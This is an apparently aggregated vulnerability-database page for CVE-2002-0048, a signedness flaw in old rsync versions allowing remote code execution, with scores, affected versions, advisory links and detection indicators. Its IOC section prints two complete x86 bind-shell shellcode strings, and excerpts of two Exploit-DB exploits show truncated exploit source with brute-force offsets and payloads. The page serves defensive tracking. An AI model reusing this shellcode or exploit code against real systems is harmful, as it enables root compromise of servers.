CVE-2002-0048
published 2002-02-27CVE-2002-0048: Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
34.02%
98.2th percentile
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
| andrew_tridgell | rsync | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff
bytes↗
\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff\xff/bin/sh
- →Exploit targets rsync daemons running protocol version < 26 (rsyncd version string). A connecting client sending '@RSYNCD: 26' banner to a vulnerable server (version < 26) is a strong exploit indicator. ↗
- →Exploit sends a negative (signed) integer value over the rsync socket to trigger the signedness bug; monitor for abnormally large or negative length values in rsync I/O traffic on TCP/873. ↗
- →Post-exploitation shellcode opens a bind shell on TCP port 30464; detect unexpected listening services on port 30464 on rsync servers. ↗
- →Exploit sends a crafted oversized path buffer (up to MAXPATHLEN=4096 bytes) over the rsync module request to corrupt the stack frame pointer via a NULL byte write. ↗
- →Exploit requires rsync server to have chroot disabled (chroot=false in rsyncd.conf) to be exploitable for arbitrary code execution. ↗
- ·The vulnerability is exploitable only when the rsync daemon has chroot disabled in its configuration. Enabling chroot mitigates arbitrary code execution. ↗
- ·Affected versions include rsync 2.3.2, 2.4.6, 2.5.0, and 2.5.1; rsync protocol versions below 26 are targeted by the public exploits. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cmff-ch37-hx8m: Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2
ghsa_unreviewed·2022-05-03
CVE-2002-0048 [HIGH] GHSA-cmff-ch37-hx8m: Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
Red Hat
security flaw
vendor_redhat·2002-01-25·CVSS 10.0
CVE-2002-0048 [CRITICAL] security flaw
security flaw
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
No detection rules found.
Exploit-DB
rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution
exploitdb·2002-01-25
CVE-2002-0048 rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution
rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution
---
// source: https://www.securityfocus.com/bid/3958/info
A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index, allowing NULL bytes to be written to arbitrary memory locations. Exploitation of this vulnerability could lead to the corruption of the stack, and possibly to execution of arbitrary code as the root user.
It is possible that other versions of rsync share this vulnerability.
/*
* linux rsync = MAXPATHLEN
* read_sbuf will in turn do a buf[len] = 0; (without performing any reads)
* we can modify read_sbuf's saved frame pointer by putting a 0 in the LSB.
* When read_sbuf exits the stack pointer will be set to the modified value
* we
Exploit-DB
rsync 2.5.1 - Remote (1)
exploitdb·2002-01-01
CVE-2002-0048 rsync 2.5.1 - Remote (1)
rsync 2.5.1 - Remote (1)
---
/*** 7350fuqnut - rsync
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MAXPATHLEN 4096
#define VERSION "@RSYNCD: 26\n"
#define PORT 873
#define NULL_OFFSET -48
#define STARTNULLBRUTE -44
#define ENDNULLBRUTE -56
#define BRUTEBASE 0xbfff7777
#define INCREMENT 512
#define ALLIGN 0 /* pop byte allignment */
#define SEND "uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */
void handleshell(int closeme, int s);
void usage(char *n);
char chode[] = /* Taeho oh, port 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x
Exploit-DB
rsync 2.5.1 - Remote (2)
exploitdb·2002-01-01
CVE-2002-0048 rsync 2.5.1 - Remote (2)
rsync 2.5.1 - Remote (2)
---
/* 7350rsync - rsync
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MAXPATHLEN 4096
#define VERSION "@RSYNCD: 26\n"
#define PORT 873
#define NULL_OFFSET -48
#define STARTNULLBRUTE -44
#define ENDNULLBRUTE -56
#define BRUTEBASE 0xbfff7777
#define INCREMENT 512
#define ALLIGN 0 /* pop byte allignment */
#define SEND "uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */
void handleshell(int closeme, int s);
void usage(char *n);
char linux_port[] = /* x86 linux portshell 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:10.rsync.aschttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000458http://lists.suse.com/archives/suse-security-announce/2002-Jan/0003.htmlhttp://marc.info/?l=bugtraq&m=101223214906963&w=2http://marc.info/?l=bugtraq&m=101223603321315&w=2http://online.securityfocus.com/advisories/3839http://www.caldera.com/support/security/advisories/CSSA-2002-003.0.txthttp://www.debian.org/security/2002/dsa-106http://www.iss.net/security_center/static/7993.phphttp://www.kb.cert.org/vuls/id/800635http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-009.phphttp://www.linuxsecurity.com/advisories/other_advisory-1853.htmlhttp://www.redhat.com/support/errata/RHSA-2002-018.htmlhttp://www.securityfocus.com/bid/3958ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:10.rsync.aschttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000458http://lists.suse.com/archives/suse-security-announce/2002-Jan/0003.htmlhttp://marc.info/?l=bugtraq&m=101223214906963&w=2http://marc.info/?l=bugtraq&m=101223603321315&w=2http://online.securityfocus.com/advisories/3839http://www.caldera.com/support/security/advisories/CSSA-2002-003.0.txthttp://www.debian.org/security/2002/dsa-106http://www.iss.net/security_center/static/7993.phphttp://www.kb.cert.org/vuls/id/800635http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-009.phphttp://www.linuxsecurity.com/advisories/other_advisory-1853.htmlhttp://www.redhat.com/support/errata/RHSA-2002-018.htmlhttp://www.securityfocus.com/bid/3958
2002-02-27
Published